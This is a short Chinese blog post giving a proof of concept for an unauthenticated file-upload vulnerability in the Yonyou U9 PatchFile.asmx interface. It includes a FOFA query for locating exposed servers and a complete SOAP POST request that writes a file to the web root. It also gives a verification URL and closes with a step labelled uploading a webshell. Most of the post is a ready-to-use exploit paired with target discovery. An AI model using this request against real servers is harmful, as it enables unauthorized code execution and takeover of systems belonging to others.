Babing
Published on 2024-08-30 / 3 Visits
0
0

Y18-1用友-U9-文件上传

Y18-1用友-U9-文件上传

漏洞描述:

用友U9 PatchFile.asmx接口处存在文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

影响版本:

用友U9 <= V6.6企业版  

网站图片:

image-20240624081447627

网络测绘:

fofa语法:

title==” U9-登录 "

漏洞复现:

payload:

/CS/Office/AutoUpdates/PatchFile.asmx?op=SaveFile

效果图:
出现以上情况则可能存在漏洞
PoC

POST /CS/Office/AutoUpdates/PatchFile.asmx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Content-Type: text/xml; charset=utf-8

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SaveFile xmlns="http://tempuri.org/">
      <binData>MTIzNDU2</binData>
      <path>./</path>
      <fileName>1.txt</fileName>
    </SaveFile>
  </soap:Body>
</soap:Envelope>

image-20240624081526500

验证url

/CS/Office/AutoUpdates/1.txt

上传webshell


Comment